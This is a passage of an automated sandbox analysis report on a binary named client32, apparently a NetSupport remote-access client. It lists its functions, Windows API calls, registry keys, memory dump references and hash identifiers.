                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocateErrorExitHeapLastMessageProcess_malloc_memsetwsprintf
                                                                                                                                                                • String ID: ..\ctl32\Refcount.cpp
                                                                                                                                                                • API String ID: 2803934178-2363596943
                                                                                                                                                                • Opcode ID: 1dad7423e7d09c371aaf82e5f4f0c79299b8a2cfda0255715acc90ffe98602aa
                                                                                                                                                                • Instruction ID: 747f5be640ff5df7f7be77ac0748be8e5b1ae2afb2ba592a3adef8646797d69b
                                                                                                                                                                • Opcode Fuzzy Hash: 1dad7423e7d09c371aaf82e5f4f0c79299b8a2cfda0255715acc90ffe98602aa
                                                                                                                                                                • Instruction Fuzzy Hash: B5E0C23AE4013933C112258A2C03FDBF69C8BD19FCF060021FE0CAA201E586B55181E6
                                                                                                                                                                Function 11014FD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18fileCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000,00000001,1102EFB6,MiniDumpType,000000FF,00000000,00000000,?,?,View), ref: 11014FE7
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,View,Client,Bridge), ref: 11014FF8
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseCreateFileHandle
                                                                                                                                                                • String ID: \\.\NSWFPDrv
                                                                                                                                                                • API String ID: 3498533004-85019792
                                                                                                                                                                • Opcode ID: f0badf7843dd101c9c7a596aad23f33c11cadc83e0c29f65da520d4fe63b43e1
                                                                                                                                                                • Instruction ID: 0b573536b28af4079515d3142ca801f5deca53cbeb6a996f0a1660ae0aa1d84a
                                                                                                                                                                • Opcode Fuzzy Hash: f0badf7843dd101c9c7a596aad23f33c11cadc83e0c29f65da520d4fe63b43e1
                                                                                                                                                                • Instruction Fuzzy Hash: A9D0C971A051387AF23416B66C4CFC7AD09DF06BB5F210264B53DE11D886104C41C2F1
                                                                                                                                                                Function 1115BDE0 Relevance: 4.7, APIs: 3, Instructions: 158COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _calloc
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1679841372-0
                                                                                                                                                                • Opcode ID: 9cedd041eecb3df7698fbc33d80b44fc007d69f78d2f5524ab9bd2bf2492814b
                                                                                                                                                                • Instruction ID: 0024421513bb2e1abb717dbf2ce3cdefbb73aa1ee3cdb3a5feae03928f974db8
                                                                                                                                                                • Opcode Fuzzy Hash: 9cedd041eecb3df7698fbc33d80b44fc007d69f78d2f5524ab9bd2bf2492814b
                                                                                                                                                                • Instruction Fuzzy Hash: 8C519E7560020AAFDB50CF68CC81FAAB7A6FF8A704F148459F929DB280D771E901CF95
                                                                                                                                                                Function 11111430 Relevance: 4.5, APIs: 3, Instructions: 49COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111145A
                                                                                                                                                                • __wsplitpath.LIBCMT ref: 11111475
                                                                                                                                                                  • Part of subcall function 11169044: __splitpath_helper.LIBCMT ref: 11169086
                                                                                                                                                                • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111114A9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DirectoryInformationSystemVolume__splitpath_helper__wsplitpath
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1847508633-0
                                                                                                                                                                • Opcode ID: 7498e584b69856d4904a5e87c0faea6464729445070a8fc0c411536d822b12a4
                                                                                                                                                                • Instruction ID: 71a9510f599fa1c136cb45ff21797ad5c5790827a759e4d2b52c0b71367846c8
                                                                                                                                                                • Opcode Fuzzy Hash: 7498e584b69856d4904a5e87c0faea6464729445070a8fc0c411536d822b12a4
                                                                                                                                                                • Instruction Fuzzy Hash: 34116175A4021DABEB14DF94CD42FE9F378AB48B04F404199E7246B1C0E7B12A48CB65
                                                                                                                                                                Function 1109E9E0 Relevance: 4.5, APIs: 3, Instructions: 29COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA01
                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA08
                                                                                                                                                                  • Part of subcall function 1109E910: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,1102FCB2,?,00000000), ref: 1109E948
                                                                                                                                                                  • Part of subcall function 1109E910: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109E964
                                                                                                                                                                  • Part of subcall function 1109E910: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,013808B8,013808B8,013808B8,013808B8,013808B8,013808B8,013808B8,111EEB64,?,00000001,00000001), ref: 1109E990
                                                                                                                                                                  • Part of subcall function 1109E910: EqualSid.ADVAPI32(?,013808B8,?,00000001,00000001), ref: 1109E9A3
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1109EA27
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2256153495-0
                                                                                                                                                                • Opcode ID: 3278d9adbe4d3509b3b3548b9dad78e2718189f4cc0d765404142b0664a012dd
                                                                                                                                                                • Instruction ID: 36b54363b319bb335bc5da0d0e9bdd0405b18079b131e91390d3ecc07929186c
                                                                                                                                                                • Opcode Fuzzy Hash: 3278d9adbe4d3509b3b3548b9dad78e2718189f4cc0d765404142b0664a012dd
                                                                                                                                                                • Instruction Fuzzy Hash: DCF05E78A15328EFD709CFF5D88482EB7A9AF08208700447DF629D3205E631EE009F50
                                                                                                                                                                Function 1110F720 Relevance: 3.8, APIs: 3, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • InitializeCriticalSection.KERNEL32(111F0908,59FD48C0,?,?,?,?,-00000001,11182078,000000FF,?,1110F7F8,00000001,?,11169683,?), ref: 1110F754
                                                                                                                                                                • EnterCriticalSection.KERNEL32(111F0908,59FD48C0,?,?,?,?,-00000001,11182078,000000FF,?,1110F7F8,00000001,?,11169683,?), ref: 1110F770
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(111F0908,?,?,?,?,-00000001,11182078,000000FF,?,1110F7F8,00000001,?,11169683,?), ref: 1110F7B8
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$EnterInitializeLeave
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3991485460-0
                                                                                                                                                                • Opcode ID: de9cc3b242b9749762f72f1a9abe3d064888d8cc99300df6bb387b99347c91a8
                                                                                                                                                                • Instruction ID: 724175da6b3b5eb63f60f43096b8b9410b0df93e13cce3f4766159a849acac97
                                                                                                                                                                • Opcode Fuzzy Hash: de9cc3b242b9749762f72f1a9abe3d064888d8cc99300df6bb387b99347c91a8
                                                                                                                                                                • Instruction Fuzzy Hash: 3D11C675A0061AAFE700CF65CD85B5BF7A9FB88714F010129E829E3340F7359808CB92
                                                                                                                                                                Function 11068950 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(00000000,00000000), ref: 11068A12
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                • String ID: ??CTL32.DLL
                                                                                                                                                                • API String ID: 1029625771-2984404022
                                                                                                                                                                • Opcode ID: f114da26ba1a202df3ee97640f196ffb6169a957819133968d89773a25347f90
                                                                                                                                                                • Instruction ID: 38d720fc7c26638894156a2f8924bac31edb6b50614c34829f37a9a02c5b1e22
                                                                                                                                                                • Opcode Fuzzy Hash: f114da26ba1a202df3ee97640f196ffb6169a957819133968d89773a25347f90
                                                                                                                                                                • Instruction Fuzzy Hash: 5831F5B2A04781DFE711CF59DC40B5AF7E8FB45724F0482AAE92897380E735A900CB92
                                                                                                                                                                Function 11026B40 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetDriveTypeA.KERNEL32(?), ref: 11026B6D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DriveType
                                                                                                                                                                • String ID: ?:\
                                                                                                                                                                • API String ID: 338552980-2533537817
                                                                                                                                                                • Opcode ID: b7a90a31e7e06615914d848c67eda86d39421f745c303f5cb5263aa0826e519a
                                                                                                                                                                • Instruction ID: c0198090b602517e4922a9d0df48f1c050a77905515f879100581957a4b6d58d
                                                                                                                                                                • Opcode Fuzzy Hash: b7a90a31e7e06615914d848c67eda86d39421f745c303f5cb5263aa0826e519a
                                                                                                                                                                • Instruction Fuzzy Hash: 64F09065C083DA2AEB23DE608844596BFE84B463A8F5488D9DCE887541D165E1C58791
                                                                                                                                                                Function 110ED1A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32registryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 110ED160: RegCloseKey.KERNEL32(?,?,?,110ED1AD,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED16D
                                                                                                                                                                • RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED1BC
                                                                                                                                                                  • Part of subcall function 110ECF40: wvsprintfA.USER32(?,00020019,?), ref: 110ECF6B
                                                                                                                                                                Strings
                                                                                                                                                                • Error %d Opening regkey %s, xrefs: 110ED1CA
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseOpenwvsprintf
                                                                                                                                                                • String ID: Error %d Opening regkey %s
                                                                                                                                                                • API String ID: 1772833024-3994271378
                                                                                                                                                                • Opcode ID: 503dc904c3fe8a3076b33c474287afaa84f0668cd560d7128fb7a99791884548
                                                                                                                                                                • Instruction ID: 33cf1931661e2960d377c619dd89904b97ea319b13ae6f8f8dcb9591a9c6775e
                                                                                                                                                                • Opcode Fuzzy Hash: 503dc904c3fe8a3076b33c474287afaa84f0668cd560d7128fb7a99791884548
                                                                                                                                                                • Instruction Fuzzy Hash: 60E0927A6012187FD210961B9C89F9BBB2DDB856A4F000069FD1487201C972EC1082B0
                                                                                                                                                                Function 110ED160 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25registryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • RegCloseKey.KERNEL32(?,?,?,110ED1AD,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED16D
                                                                                                                                                                  • Part of subcall function 110ECF40: wvsprintfA.USER32(?,00020019,?), ref: 110ECF6B
                                                                                                                                                                Strings
                                                                                                                                                                • Error %d closing regkey %x, xrefs: 110ED17D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
